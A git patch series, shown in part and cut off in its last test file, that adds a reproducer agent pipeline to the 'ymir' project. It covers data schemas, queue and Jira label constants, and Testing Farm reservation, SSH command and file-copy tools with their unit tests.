From 97b4db3456959bb92cca87659fa4dea9faaa76b1 Mon Sep 17 00:00:00 2001 From: Vincent Mihalkovic Date: Thu, 18 Jun 2026 08:51:59 +0200 Subject: [PATCH 01/16] Add reproducer input/output models and unit tests Add ReproducerInputSchema and ReproducerOutputSchema for structured agent input/output with validation. Includes comprehensive unit tests. Co-Authored-By: Claude Opus 4.6 --- ymir/common/models.py | 37 +++++++++ ymir/common/tests/unit/test_models.py | 106 ++++++++++++++++++++++++++ 2 files changed, 143 insertions(+) diff --git a/ymir/common/models.py b/ymir/common/models.py index c0bb1f7a..71b06da4 100644 --- a/ymir/common/models.py +++ b/ymir/common/models.py @@ -956,3 +956,40 @@ class WorkflowResult(BaseModel): reschedule_in: float = Field( description="Delay in seconds to reschedule the work item. Negative value means don't reschedule" ) + + +# ============================================================================ +# Reproducer Agent Schemas +# ============================================================================ + + +class ReproducerInputSchema(BaseModel): + """Input schema for the reproducer agent.""" + + jira_issue: str = Field(description="Jira issue identifier") + package: str | None = Field(default=None, description="Package name") + cve_id: str | None = Field(default=None, description="CVE identifier") + patch_urls: list[str] | None = Field(default=None, description="List of URLs to upstream patches") + triage_summary: str | None = Field( + default=None, + description="Triage context: what was investigated and guidance on how the reproducer should be done", + ) + fix_version: str | None = Field(default=None, description="Fix version in Jira (e.g., 'rhel-9.8')") + target_branch: str | None = Field(default=None, description="Target dist-git branch") + + +class ReproducerOutputSchema(BaseModel): + """Output schema for the reproducer agent.""" + + jira_issue: str = Field(description="Jira issue identifier") + success: bool = 
Field(description="Whether the reproducer was successfully completed") + reproducer_type: Literal["cve", "bug"] = Field(description="Type of reproducer: 'cve' or 'bug'") + test_mr_url: str | None = Field(default=None, description="URL of the test merge request") + testing_farm_request_id: str | None = Field( + default=None, description="Testing Farm request ID for the submitted test run" + ) + pass_fail_criteria: str = Field(description="Criteria used to determine pass or fail") + summary: str = Field(description="Summary of the reproducer result") + not_reproducible_reason: str | None = Field( + default=None, description="Reason the issue could not be reproduced, if applicable" + ) diff --git a/ymir/common/tests/unit/test_models.py b/ymir/common/tests/unit/test_models.py index 4efd6119..87d3830c 100644 --- a/ymir/common/tests/unit/test_models.py +++ b/ymir/common/tests/unit/test_models.py @@ -11,6 +11,8 @@ PostponedData, RebaseData, RebuildData, + ReproducerInputSchema, + ReproducerOutputSchema, Resolution, TriageOutputSchema, ) @@ -446,3 +448,107 @@ def test_backport_formatting_without_triage_summary(): comment = result.format_for_comment() assert "*Triage Reasoning*" not in comment assert "*Justification*: Fixes the bug in bind.c" in comment + + +# --- ReproducerInputSchema / ReproducerOutputSchema tests --- + + +def test_reproducer_input_minimal(): + """Create with only required field (jira_issue), verify optional fields default to None.""" + data = ReproducerInputSchema(jira_issue="RHEL-99999") + assert data.jira_issue == "RHEL-99999" + assert data.package is None + assert data.cve_id is None + assert data.patch_urls is None + assert data.triage_summary is None + assert data.fix_version is None + assert data.target_branch is None + + +def test_reproducer_input_full(): + """Create with all fields populated, verify values.""" + data = ReproducerInputSchema( + jira_issue="RHEL-11111", + package="openssl", + cve_id="CVE-2025-9999", + patch_urls=[ + 
"https://github.com/openssl/openssl/commit/abc123.patch", + "https://github.com/openssl/openssl/commit/def456.patch", + ], + triage_summary="Buffer overflow in TLS handshake parsing.", + fix_version="rhel-9.8", + target_branch="rhel-9.8.0", + ) + assert data.jira_issue == "RHEL-11111" + assert data.package == "openssl" + assert data.cve_id == "CVE-2025-9999" + assert data.patch_urls == [ + "https://github.com/openssl/openssl/commit/abc123.patch", + "https://github.com/openssl/openssl/commit/def456.patch", + ] + assert data.triage_summary == "Buffer overflow in TLS handshake parsing." + assert data.fix_version == "rhel-9.8" + assert data.target_branch == "rhel-9.8.0" + + +def test_reproducer_output_success(): + """Create a successful reproducer output with test_mr_url set.""" + data = ReproducerOutputSchema( + jira_issue="RHEL-11111", + success=True, + reproducer_type="cve", + test_mr_url="https://gitlab.com/tests/openssl/-/merge_requests/42", + testing_farm_request_id="tf-req-abc123", + pass_fail_criteria=( + "Test triggers the buffer overflow on unpatched build and passes on patched build." 
+ ), + summary="Reproducer created and submitted to Testing Farm.", + ) + assert data.success is True + assert data.reproducer_type == "cve" + assert data.test_mr_url == "https://gitlab.com/tests/openssl/-/merge_requests/42" + assert data.testing_farm_request_id == "tf-req-abc123" + assert data.not_reproducible_reason is None + + +def test_reproducer_output_not_reproducible(): + """Create with success=False and not_reproducible_reason set.""" + data = ReproducerOutputSchema( + jira_issue="RHEL-22222", + success=False, + reproducer_type="bug", + pass_fail_criteria="Expected segfault when processing crafted input.", + summary="Could not reproduce the reported crash.", + not_reproducible_reason="The vulnerable code path is not reachable with the shipped configuration.", + ) + assert data.success is False + assert data.reproducer_type == "bug" + assert data.test_mr_url is None + assert data.testing_farm_request_id is None + assert data.not_reproducible_reason == ( + "The vulnerable code path is not reachable with the shipped configuration." 
+ ) + + +def test_reproducer_output_roundtrip(): + """Serialize to JSON and back, verify all fields survive.""" + original = ReproducerOutputSchema( + jira_issue="RHEL-33333", + success=True, + reproducer_type="cve", + test_mr_url="https://gitlab.com/tests/curl/-/merge_requests/7", + testing_farm_request_id="tf-req-xyz789", + pass_fail_criteria="Exploit PoC returns exit code 1 on vulnerable build, 0 on fixed.", + summary="CVE reproducer submitted successfully.", + not_reproducible_reason=None, + ) + json_str = original.model_dump_json() + restored = ReproducerOutputSchema.model_validate_json(json_str) + assert restored.jira_issue == original.jira_issue + assert restored.success == original.success + assert restored.reproducer_type == original.reproducer_type + assert restored.test_mr_url == original.test_mr_url + assert restored.testing_farm_request_id == original.testing_farm_request_id + assert restored.pass_fail_criteria == original.pass_fail_criteria + assert restored.summary == original.summary + assert restored.not_reproducible_reason is None From df4f489fc55f06ed11ff74a224d00912d20d4501 Mon Sep 17 00:00:00 2001 From: Vincent Mihalkovic Date: Thu, 18 Jun 2026 08:52:04 +0200 Subject: [PATCH 02/16] Add reproducer queue constants and Jira labels Add reproducer queue names (REPRODUCER_QUEUE, REPRODUCER_QUEUE_TODO, COMPLETED_REPRODUCER_LIST) and lifecycle labels (REPRODUCER_IN_PROGRESS, REPRODUCER_CREATED, REPRODUCER_FAILED, REPRODUCER_ERRORED, REPRODUCER_NOT_REPRODUCIBLE) for tracking reproducer agent pipeline state in Jira. 
Co-Authored-By: Claude Opus 4.6 --- ymir/common/constants.py | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/ymir/common/constants.py b/ymir/common/constants.py index 56995770..c6d38efd 100644 --- a/ymir/common/constants.py +++ b/ymir/common/constants.py @@ -47,6 +47,9 @@ class RedisQueues(Enum): REBASE_QUEUE = "rebase_queue" BACKPORT_QUEUE = "backport_queue" POSTPONED_LIST = "postponed_list" + REPRODUCER_QUEUE = "reproducer_queue" + REPRODUCER_QUEUE_TODO = "reproducer_queue_todo" + COMPLETED_REPRODUCER_LIST = "completed_reproducer_list" @classmethod def all_queues(cls) -> set[str]: @@ -74,6 +77,8 @@ def input_queues(cls) -> set[str]: cls.CLARIFICATION_NEEDED_QUEUE.value, cls.REBASE_QUEUE.value, cls.BACKPORT_QUEUE.value, + cls.REPRODUCER_QUEUE.value, + cls.REPRODUCER_QUEUE_TODO.value, } @classmethod @@ -85,6 +90,7 @@ def data_queues(cls) -> set[str]: cls.COMPLETED_REBASE_LIST.value, cls.COMPLETED_BACKPORT_LIST.value, cls.COMPLETED_REBUILD_LIST.value, + cls.COMPLETED_REPRODUCER_LIST.value, cls.POSTPONED_LIST.value, } @@ -155,6 +161,11 @@ class JiraLabels(Enum): REBASE_FAILED = "ymir_rebase_failed" BACKPORT_FAILED = "ymir_backport_failed" REBUILD_FAILED = "ymir_rebuild_failed" + REPRODUCER_IN_PROGRESS = "ymir_reproducer_in_progress" + REPRODUCER_CREATED = "ymir_reproducer_created" + REPRODUCER_FAILED = "ymir_reproducer_failed" + REPRODUCER_ERRORED = "ymir_reproducer_errored" + REPRODUCER_NOT_REPRODUCIBLE = "ymir_reproducer_not_reproducible" TRIAGED_POSTPONED = "ymir_triaged_postponed" TRIAGED_NOT_AFFECTED = "ymir_triaged_not_affected" From 54d7ae80e70d3e0ccda8792ceb9dd83a9d0c6984 Mon Sep 17 00:00:00 2001 From: Vincent Mihalkovic Date: Thu, 18 Jun 2026 09:19:33 +0200 Subject: [PATCH 03/16] Make Testing Farm API URL configurable and harden API helpers Make TF API URL configurable via TESTING_FARM_API_URL env var (defaults to testing-farm.io). 
Add _redact_secrets for safe logging of API payloads, _testing_farm_api_delete helper, _ensure_gateway_ssh_key for gateway-managed SSH key generation, and _parse_tf_request helper. Co-Authored-By: Claude Opus 4.6 --- ymir/tools/privileged/testing_farm.py | 67 +++++++++++++++++++++++---- 1 file changed, 58 insertions(+), 9 deletions(-) diff --git a/ymir/tools/privileged/testing_farm.py b/ymir/tools/privileged/testing_farm.py index c1aa7c9f..eafeb35e 100644 --- a/ymir/tools/privileged/testing_farm.py +++ b/ymir/tools/privileged/testing_farm.py @@ -1,15 +1,21 @@ +import asyncio +import base64 import logging import os +import re +import subprocess +import threading from datetime import datetime from functools import cache from json import dumps as json_dumps +from pathlib import Path from typing import Any import requests from beeai_framework.context import RunContext from beeai_framework.emitter import Emitter from beeai_framework.tools import JSONToolOutput, Tool, ToolError, ToolRunOptions -from pydantic import BaseModel, Field +from pydantic import BaseModel, Field, field_validator from ymir.common.models import ( TestingFarmRequest, @@ -18,7 +24,21 @@ logger = logging.getLogger(__name__) -TESTING_FARM_URL = "https://api.testing-farm.io/v0.1" +_REDACTED_KEYS = frozenset({"secrets", "api_key", "token", "password"}) + + +def _redact_secrets(obj: Any) -> Any: + """Recursively redact sensitive keys from a nested dict/list structure.""" + if isinstance(obj, dict): + return {k: ("***" if k in _REDACTED_KEYS else _redact_secrets(v)) for k, v in obj.items()} + if isinstance(obj, list): + return [_redact_secrets(item) for item in obj] + return obj + + +@cache +def _testing_farm_url() -> str: + return os.environ.get("TESTING_FARM_API_URL", "https://api.testing-farm.io/v0.1") @cache @@ -30,8 +50,28 @@ def _testing_farm_headers() -> dict[str, str]: } +_SSH_KEY_PATH = Path.home() / ".ssh" / "id_ed25519" +_ssh_key_lock = threading.Lock() + + +def _ensure_gateway_ssh_key() -> str: 
+ """Ensure the gateway has an SSH key pair and return the public key content.""" + pub_path = _SSH_KEY_PATH.with_suffix(".pub") + with _ssh_key_lock: + if not _SSH_KEY_PATH.exists() or not pub_path.exists(): + _SSH_KEY_PATH.parent.mkdir(parents=True, exist_ok=True, mode=0o700) + _SSH_KEY_PATH.unlink(missing_ok=True) + pub_path.unlink(missing_ok=True) + subprocess.run( + ["ssh-keygen", "-t", "ed25519", "-f", str(_SSH_KEY_PATH), "-N", "", "-q"], + check=True, + ) + logger.info("Generated gateway SSH key pair at %s", _SSH_KEY_PATH) + return pub_path.read_text().strip() + + def _testing_farm_api_get(path: str, *, params: dict | None = None) -> Any: - url = f"{TESTING_FARM_URL}/{path}" + url = f"{_testing_farm_url()}/{path}" response = requests.get(url, headers=_testing_farm_headers(), params=params, timeout=30) if not response.ok: logger.error( @@ -42,16 +82,25 @@ def _testing_farm_api_get(path: str, *, params: dict | None = None) -> Any: def _testing_farm_api_post(path: str, json: dict[str, Any]) -> Any: - url = f"{TESTING_FARM_URL}/{path}" + url = f"{_testing_farm_url()}/{path}" response = requests.post(url, headers=_testing_farm_headers(), json=json, timeout=30) if not response.ok: logger.error( - "POST to %s failed\nbody:\n%s\nerror:\n%s", url, json_dumps(json, indent=2), response.text + "POST to %s failed\nbody:\n%s\nerror:\n%s", + url, json_dumps(_redact_secrets(json), indent=2), response.text ) response.raise_for_status() return response.json() +def _testing_farm_api_delete(path: str) -> None: + url = f"{_testing_farm_url()}/{path}" + response = requests.delete(url, headers=_testing_farm_headers(), timeout=30) + if not response.ok: + logger.error("DELETE %s failed.\nerror:\n%s", url, response.text) + response.raise_for_status() + + def _parse_tf_request(response: dict[str, Any]) -> TestingFarmRequest: result_data = response.get("result") result = result_data["overall"] if result_data else TestingFarmRequestResult.UNKNOWN @@ -59,7 +108,7 @@ def 
_parse_tf_request(response: dict[str, Any]) -> TestingFarmRequest: return TestingFarmRequest( id=response["id"], - url=f"{TESTING_FARM_URL}/requests/{response['id']}", + url=f"{_testing_farm_url()}/requests/{response['id']}", state=response["state"], result=result, error_reason=error_reason, @@ -101,7 +150,7 @@ async def _run( ) -> JSONToolOutput[dict[str, Any]]: logger.info("Getting Testing Farm request %s", tool_input.request_id) try: - response = _testing_farm_api_get(f"requests/{tool_input.request_id}") + response = await asyncio.to_thread(_testing_farm_api_get, f"requests/{tool_input.request_id}") tf_request = _parse_tf_request(response) except Exception as e: raise ToolError(f"Failed to get Testing Farm request {tool_input.request_id}: {e}") from e @@ -149,7 +198,7 @@ async def _run( try: # Fetch the original request - original_response = _testing_farm_api_get(f"requests/{request_id}") + original_response = await asyncio.to_thread(_testing_farm_api_get, f"requests/{request_id}") original = _parse_tf_request(original_response) # Build new environments with the replacement build @@ -186,7 +235,7 @@ def create_new_environment(env: dict) -> dict: "environments": [create_new_environment(env) for env in original.environments_data], } - response = _testing_farm_api_post("requests", json=body) + response = await asyncio.to_thread(_testing_farm_api_post, "requests", json=body) new_request = _parse_tf_request(response) except Exception as e: From bb703a01c0de7e4ae6ac2e5175d3ce0d3455b6ae Mon Sep 17 00:00:00 2001 From: Vincent Mihalkovic Date: Thu, 18 Jun 2026 09:19:46 +0200 Subject: [PATCH 04/16] Add Testing Farm reservation lifecycle tools Add three MCP tools for the TF machine reservation lifecycle: - ReserveTestingFarmMachineTool: provisions machines with SSH access, security group ingress rules, and configurable compose/arch/duration - GetTestingFarmReservationDetailsTool: polls SSH availability from pipeline.log with built-in retry (20 attempts, 30s intervals) and 
transient HTTP 502/503/504 retry - CancelTestingFarmRequestTool: releases reserved machines via API Includes input validation with regex patterns for request_id and remote_dir parameters. Co-Authored-By: Claude Opus 4.6 --- ymir/tools/privileged/testing_farm.py | 272 +++++++++++++++++++++++++- 1 file changed, 270 insertions(+), 2 deletions(-) diff --git a/ymir/tools/privileged/testing_farm.py b/ymir/tools/privileged/testing_farm.py index eafeb35e..9475351e 100644 --- a/ymir/tools/privileged/testing_farm.py +++ b/ymir/tools/privileged/testing_farm.py @@ -62,8 +62,8 @@ def _ensure_gateway_ssh_key() -> str: _SSH_KEY_PATH.parent.mkdir(parents=True, exist_ok=True, mode=0o700) _SSH_KEY_PATH.unlink(missing_ok=True) pub_path.unlink(missing_ok=True) - subprocess.run( - ["ssh-keygen", "-t", "ed25519", "-f", str(_SSH_KEY_PATH), "-N", "", "-q"], + subprocess.run( # noqa: S603 + ["ssh-keygen", "-t", "ed25519", "-f", str(_SSH_KEY_PATH), "-N", "", "-q"], # noqa: S607 check=True, ) logger.info("Generated gateway SSH key pair at %s", _SSH_KEY_PATH) @@ -242,3 +242,271 @@ def create_new_environment(env: dict) -> dict: raise ToolError(f"Failed to reproduce Testing Farm request {request_id}: {e}") from e return JSONToolOutput(result=new_request.model_dump(mode="json")) + + +class ReserveTestingFarmMachineToolInput(BaseModel): + compose: str = Field(description="Compose to reserve, e.g. RHEL-9.8.0-Nightly") + arch: str = Field(default="x86_64", description="Architecture of the machine") + duration_minutes: int = Field(default=60, description="Reservation duration in minutes") + ssh_public_key: str | None = Field( + default=None, + description="SSH public key content. If omitted, the gateway's own key is used (recommended).", + ) + + +class ReserveTestingFarmMachineTool( + Tool[ReserveTestingFarmMachineToolInput, ToolRunOptions, JSONToolOutput[dict[str, Any]]] +): + name = "reserve_testing_farm_machine" + description = """ + Reserve a Testing Farm machine for SSH access. 
+ """ + input_schema = ReserveTestingFarmMachineToolInput + + def _create_emitter(self) -> Emitter: + return Emitter.root().child( + namespace=["tool", "testing_farm", self.name], + creator=self, + ) + + async def _run( + self, + tool_input: ReserveTestingFarmMachineToolInput, + options: ToolRunOptions | None, + context: RunContext, + ) -> JSONToolOutput[dict[str, Any]]: + logger.info( + "Reserving Testing Farm machine: compose=%s arch=%s duration=%dm", + tool_input.compose, + tool_input.arch, + tool_input.duration_minutes, + ) + + if os.getenv("DRY_RUN", "False").lower() == "true": + return JSONToolOutput( + result={ + "id": "dry-run-reservation", + "message": ( + f"Dry run: would reserve {tool_input.compose} {tool_input.arch} " + f"for {tool_input.duration_minutes}m" + ), + } + ) + + try: + # Always use the gateway's own SSH key so run_remote_command can authenticate + ssh_public_key = await asyncio.to_thread(_ensure_gateway_ssh_key) + if tool_input.ssh_public_key and tool_input.ssh_public_key != ssh_public_key: + logger.info( + "Ignoring agent-provided SSH key; using gateway's own key for TF reservation " + "(run_remote_command runs in the gateway container)" + ) + ssh_key_b64 = base64.b64encode(ssh_public_key.encode()).decode() + + body = { + "test": { + "fmf": { + "url": "https://gitlab.com/testing-farm/tests", + "ref": "main", + "name": "/testing-farm/reserve", + } + }, + "environments": [ + { + "arch": tool_input.arch, + "os": {"compose": tool_input.compose}, + "variables": { + "TF_RESERVATION_DURATION": str(tool_input.duration_minutes), + }, + "secrets": { + "TF_RESERVATION_AUTHORIZED_KEYS_BASE64": ssh_key_b64, + }, + "settings": { + "provisioning": { + "security_group_rules_ingress": [ + { + "type": "ingress", + "protocol": "tcp", + "cidr": "0.0.0.0/0", + "port_min": 22, + "port_max": 22, + } + ], + "security_group_rules_egress": [], + } + }, + } + ], + "settings": { + "pipeline": { + "timeout": max(tool_input.duration_minutes, 720), + } + }, + } + + 
response = await asyncio.to_thread(_testing_farm_api_post, "requests", json=body) + except Exception as e: + raise ToolError( + f"Failed to reserve Testing Farm machine: {e}" + ) from e + + return JSONToolOutput(result={"id": response["id"]}) + + +class GetTestingFarmReservationDetailsToolInput(BaseModel): + request_id: str = Field(description="Testing Farm reservation request ID", pattern=r"^[a-zA-Z0-9_-]+$") + + +class GetTestingFarmReservationDetailsTool( + Tool[GetTestingFarmReservationDetailsToolInput, ToolRunOptions, JSONToolOutput[dict[str, Any]]] +): + name = "get_testing_farm_reservation_details" + description = """ + Get the status and SSH details of a Testing Farm reservation. + Polls internally for up to 10 minutes until SSH is available or a terminal state is reached. + Do NOT wrap this tool in a retry loop — it handles waiting internally. + """ + input_schema = GetTestingFarmReservationDetailsToolInput + + def _create_emitter(self) -> Emitter: + return Emitter.root().child( + namespace=["tool", "testing_farm", self.name], + creator=self, + ) + + async def _run( + self, + tool_input: GetTestingFarmReservationDetailsToolInput, + options: ToolRunOptions | None, + context: RunContext, + ) -> JSONToolOutput[dict[str, Any]]: + logger.info("Getting Testing Farm reservation details for %s", tool_input.request_id) + + if os.getenv("DRY_RUN", "False").lower() == "true": + return JSONToolOutput( + result={"state": "complete", "ssh_connection": "root@dry-run-host"} + ) + + max_attempts = 20 + poll_interval = 30 + state = "unknown" + + _TRANSIENT_HTTP_CODES = (502, 503, 504) + + for attempt in range(1, max_attempts + 1): + try: + response = await asyncio.to_thread(_testing_farm_api_get, f"requests/{tool_input.request_id}") + except requests.RequestException as e: + is_transient = False + if isinstance(e, requests.HTTPError) and e.response is not None: + if e.response.status_code in _TRANSIENT_HTTP_CODES: + is_transient = True + elif isinstance(e, 
(requests.ConnectionError, requests.Timeout)): + is_transient = True + + if is_transient: + logger.warning( + "Transient error %s polling TF %s (attempt %d/%d)", + e, tool_input.request_id, attempt, max_attempts, + ) + if attempt < max_attempts: + await asyncio.sleep(poll_interval) + continue + raise ToolError( + f"Failed to get Testing Farm reservation details {tool_input.request_id}: {e}" + ) from e + except Exception as e: + raise ToolError( + f"Failed to get Testing Farm reservation details {tool_input.request_id}: {e}" + ) from e + + state = response.get("state", "unknown") + + if state in ("complete", "canceled", "cancel-requested", "error"): + return JSONToolOutput(result={"state": state, "ssh_connection": "not-yet-available"}) + + if state == "running": + artifacts_url = (response.get("run") or {}).get("artifacts") + if artifacts_url: + try: + log_url = f"{artifacts_url}/pipeline.log" + log_resp = await asyncio.to_thread(requests.get, log_url, timeout=30) + if log_resp.ok: + log_text = log_resp.text + guest_match = re.search( + r"Guest is ready.*root@([\d\w.\-]+)", log_text + ) + if not guest_match: + guest_match = re.search( + r"\[.*?\]\s+primary address:\s+([\d\w.\-]+)", log_text + ) + ready = "execute task #1" in log_text + if guest_match and ready: + ssh_connection = f"root@{guest_match.group(1)}" + logger.info( + "SSH available for %s: %s (attempt %d)", + tool_input.request_id, ssh_connection, attempt, + ) + return JSONToolOutput( + result={"state": state, "ssh_connection": ssh_connection} + ) + except Exception: + logger.debug("Could not fetch pipeline.log for %s", tool_input.request_id) + + if attempt < max_attempts: + logger.info( + "SSH not yet available for %s, polling again in %ds (attempt %d/%d)", + tool_input.request_id, poll_interval, attempt, max_attempts, + ) + await asyncio.sleep(poll_interval) + + return JSONToolOutput(result={"state": state, "ssh_connection": "not-yet-available"}) + + +class CancelTestingFarmRequestToolInput(BaseModel): + 
request_id: str = Field(description="Testing Farm request ID to cancel", pattern=r"^[a-zA-Z0-9_-]+$") + + +class CancelTestingFarmRequestTool( + Tool[CancelTestingFarmRequestToolInput, ToolRunOptions, JSONToolOutput[dict[str, Any]]] +): + name = "cancel_testing_farm_request" + description = """ + Cancel a Testing Farm request and release the reserved machine. + """ + input_schema = CancelTestingFarmRequestToolInput + + def _create_emitter(self) -> Emitter: + return Emitter.root().child( + namespace=["tool", "testing_farm", self.name], + creator=self, + ) + + async def _run( + self, + tool_input: CancelTestingFarmRequestToolInput, + options: ToolRunOptions | None, + context: RunContext, + ) -> JSONToolOutput[dict[str, Any]]: + request_id = tool_input.request_id + logger.info("Cancelling Testing Farm request %s", request_id) + + if os.getenv("DRY_RUN", "False").lower() == "true": + return JSONToolOutput( + result={ + "cancelled": True, + "request_id": request_id, + "message": f"Dry run: would cancel request {request_id}", + } + ) + + try: + await asyncio.to_thread(_testing_farm_api_delete, f"requests/{request_id}") + except Exception as e: + raise ToolError( + f"Failed to cancel Testing Farm request {request_id}: {e}" + ) from e + + return JSONToolOutput(result={"cancelled": True, "request_id": request_id}) + + From 4d4206dbfcd6232dc9dc4a35ec1e757214af4c16 Mon Sep 17 00:00:00 2001 From: Vincent Mihalkovic Date: Thu, 18 Jun 2026 09:19:56 +0200 Subject: [PATCH 05/16] Add RunRemoteCommand and CopyFilesToRemote tools for SSH operations Add two MCP tools for executing commands on reserved TF machines: - RunRemoteCommandTool: runs commands via SSH with configurable timeout, working directory, and gateway SSH key - CopyFilesToRemoteTool: transfers files via SCP with path validation against an allowlist of safe base directories Co-Authored-By: Claude Opus 4.6 --- ymir/tools/privileged/testing_farm.py | 183 ++++++++++++++++++++++++++ 1 file changed, 183 insertions(+) diff 
--git a/ymir/tools/privileged/testing_farm.py b/ymir/tools/privileged/testing_farm.py index 9475351e..4ef0a0f6 100644 --- a/ymir/tools/privileged/testing_farm.py +++ b/ymir/tools/privileged/testing_farm.py @@ -510,3 +510,186 @@ async def _run( return JSONToolOutput(result={"cancelled": True, "request_id": request_id}) +class RunRemoteCommandToolInput(BaseModel): + ssh_host: str = Field(description="SSH target in user@ip format", pattern=r"^[a-zA-Z0-9_]+@[\w.\-]+$") + command: str = Field(description="Command to run on the remote machine") + timeout: int = Field(default=300, description="Timeout in seconds for the command to finish") + + +class RunRemoteCommandTool( + Tool[RunRemoteCommandToolInput, ToolRunOptions, JSONToolOutput[dict[str, Any]]] +): + name = "run_remote_command" + description = """ + Run a command on a remote machine via SSH. + """ + input_schema = RunRemoteCommandToolInput + + def _create_emitter(self) -> Emitter: + return Emitter.root().child( + namespace=["tool", "testing_farm", self.name], + creator=self, + ) + + async def _run( + self, + tool_input: RunRemoteCommandToolInput, + options: ToolRunOptions | None, + context: RunContext, + ) -> JSONToolOutput[dict[str, Any]]: + ssh_host = tool_input.ssh_host + command = tool_input.command + timeout = tool_input.timeout + logger.info("Running remote command on %s: %s", ssh_host, command) + + if os.getenv("DRY_RUN", "False").lower() == "true": + return JSONToolOutput( + result={ + "stdout": "", + "stderr": "", + "exit_code": 0, + "message": f"Dry run: would run '{command}' on {ssh_host}", + } + ) + + try: + _ensure_gateway_ssh_key() + proc = await asyncio.create_subprocess_exec( + "ssh", + "-i", str(_SSH_KEY_PATH), + "-o", "StrictHostKeyChecking=no", + "-o", "UserKnownHostsFile=/dev/null", + ssh_host, + command, + stdout=asyncio.subprocess.PIPE, + stderr=asyncio.subprocess.PIPE, + ) + stdout, stderr = await asyncio.wait_for(proc.communicate(), timeout=timeout) + except TimeoutError as e: + proc.kill() 
+ await proc.wait() + raise ToolError( + f"Command timed out after {timeout}s on {ssh_host}: {command}" + ) from e + except Exception as e: + raise ToolError( + f"Failed to run command on {ssh_host}: {e}" + ) from e + + return JSONToolOutput( + result={ + "stdout": stdout.decode() if stdout else "", + "stderr": stderr.decode() if stderr else "", + "exit_code": proc.returncode, + } + ) + + +_ALLOWED_COPY_BASES = (Path("/git-repos"), Path("/tmp")) # noqa: S108 + + +class CopyFilesToRemoteToolInput(BaseModel): + ssh_host: str = Field(description="SSH host in user@ip format", pattern=r"^[a-zA-Z0-9_]+@[\w.\-]+$") + local_paths: list[str] = Field(description="Local file paths to copy") + remote_dir: str = Field( + default="/tmp/reproducer", # noqa: S108 + description="Remote directory to copy files to", + pattern=r"^[a-zA-Z0-9/_.\-]+$", + ) + timeout: int = Field(default=120, description="Timeout in seconds for the copy operation") + + @field_validator("local_paths") + @classmethod + def validate_local_paths(cls, v: list[str]) -> list[str]: + for p in v: + resolved = Path(p).resolve() + if not any(resolved.is_relative_to(base) for base in _ALLOWED_COPY_BASES): + raise ValueError( + f"Path {p} is not under an allowed directory" + f" ({', '.join(str(b) for b in _ALLOWED_COPY_BASES)})" + ) + return v + + +class CopyFilesToRemoteTool( + Tool[CopyFilesToRemoteToolInput, ToolRunOptions, JSONToolOutput[dict[str, Any]]] +): + name = "copy_files_to_remote" + description = """ + Copy files to a remote machine via SCP. 
+ """ + input_schema = CopyFilesToRemoteToolInput + + def _create_emitter(self) -> Emitter: + return Emitter.root().child( + namespace=["tool", "testing_farm", self.name], + creator=self, + ) + + async def _run( + self, + tool_input: CopyFilesToRemoteToolInput, + options: ToolRunOptions | None, + context: RunContext, + ) -> JSONToolOutput[dict[str, Any]]: + ssh_host = tool_input.ssh_host + local_paths = tool_input.local_paths + remote_dir = tool_input.remote_dir + timeout = tool_input.timeout + logger.info("Copying %s to %s:%s", local_paths, ssh_host, remote_dir) + + if os.getenv("DRY_RUN", "False").lower() == "true": + return JSONToolOutput( + result={ + "copied": True, + "remote_dir": remote_dir, + "files": local_paths, + "message": f"Dry run: would copy {local_paths} to {ssh_host}:{remote_dir}", + } + ) + + _ensure_gateway_ssh_key() + ssh_opts = [ + "-i", str(_SSH_KEY_PATH), + "-o", "StrictHostKeyChecking=no", + "-o", "UserKnownHostsFile=/dev/null", + ] + + active_proc = None + try: + # Create the remote directory + active_proc = await asyncio.create_subprocess_exec( + "ssh", *ssh_opts, ssh_host, "mkdir", "-p", remote_dir, + stdout=asyncio.subprocess.PIPE, + stderr=asyncio.subprocess.PIPE, + ) + _, stderr = await asyncio.wait_for(active_proc.communicate(), timeout=timeout) + if active_proc.returncode != 0: + raise RuntimeError( + f"Failed to create remote directory {remote_dir}: {stderr.decode().strip()}" + ) + + # Copy files via scp + active_proc = await asyncio.create_subprocess_exec( + "scp", *ssh_opts, "-r", *local_paths, f"{ssh_host}:{remote_dir}", + stdout=asyncio.subprocess.PIPE, + stderr=asyncio.subprocess.PIPE, + ) + _, stderr = await asyncio.wait_for(active_proc.communicate(), timeout=timeout) + if active_proc.returncode != 0: + raise RuntimeError( + f"SCP failed: {stderr.decode().strip()}" + ) + except TimeoutError as e: + if active_proc: + active_proc.kill() + await active_proc.wait() + raise ToolError( + f"Copy operation timed out after {timeout}s 
to {ssh_host}:{remote_dir}" + ) from e + except Exception as e: + raise ToolError( + f"Failed to copy files to {ssh_host}:{remote_dir}: {e}" + ) from e + + return JSONToolOutput(result={"copied": True, "remote_dir": remote_dir, "files": local_paths}) From 4a1cfb1ae83d370a94323d817b8cdf9457f2a9f7 Mon Sep 17 00:00:00 2001 From: Vincent Mihalkovic Date: Thu, 18 Jun 2026 09:24:48 +0200 Subject: [PATCH 06/16] Add Testing Farm tools unit tests Comprehensive test suite covering all TF tools: reservation, polling with retry/transient-error handling, cancellation, remote command execution, file copying, input validation patterns, SSH key management, and dry-run mode. Co-Authored-By: Claude Opus 4.6 --- .../tests/unit/test_testing_farm.py | 713 ++++++++++++++++++ 1 file changed, 713 insertions(+) create mode 100644 ymir/tools/privileged/tests/unit/test_testing_farm.py diff --git a/ymir/tools/privileged/tests/unit/test_testing_farm.py b/ymir/tools/privileged/tests/unit/test_testing_farm.py new file mode 100644 index 00000000..801921e9 --- /dev/null +++ b/ymir/tools/privileged/tests/unit/test_testing_farm.py @@ -0,0 +1,713 @@ +"""Unit tests for ReserveTestingFarmMachineTool and GetTestingFarmReservationDetailsTool.""" + +import asyncio +import base64 +from unittest.mock import AsyncMock, MagicMock, patch + +import pytest +import requests +from beeai_framework.tools import ToolError +from flexmock import flexmock +from pydantic import ValidationError + +from ymir.tools.privileged import testing_farm as tf_module +from ymir.tools.privileged.testing_farm import ( + _SSH_KEY_PATH, + CancelTestingFarmRequestTool, + CancelTestingFarmRequestToolInput, + CopyFilesToRemoteTool, + CopyFilesToRemoteToolInput, + GetTestingFarmReservationDetailsTool, + GetTestingFarmReservationDetailsToolInput, + ReserveTestingFarmMachineTool, + RunRemoteCommandTool, +) + +SAMPLE_SSH_KEY = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAITestKey user@host" +GATEWAY_SSH_KEY = "ssh-ed25519 
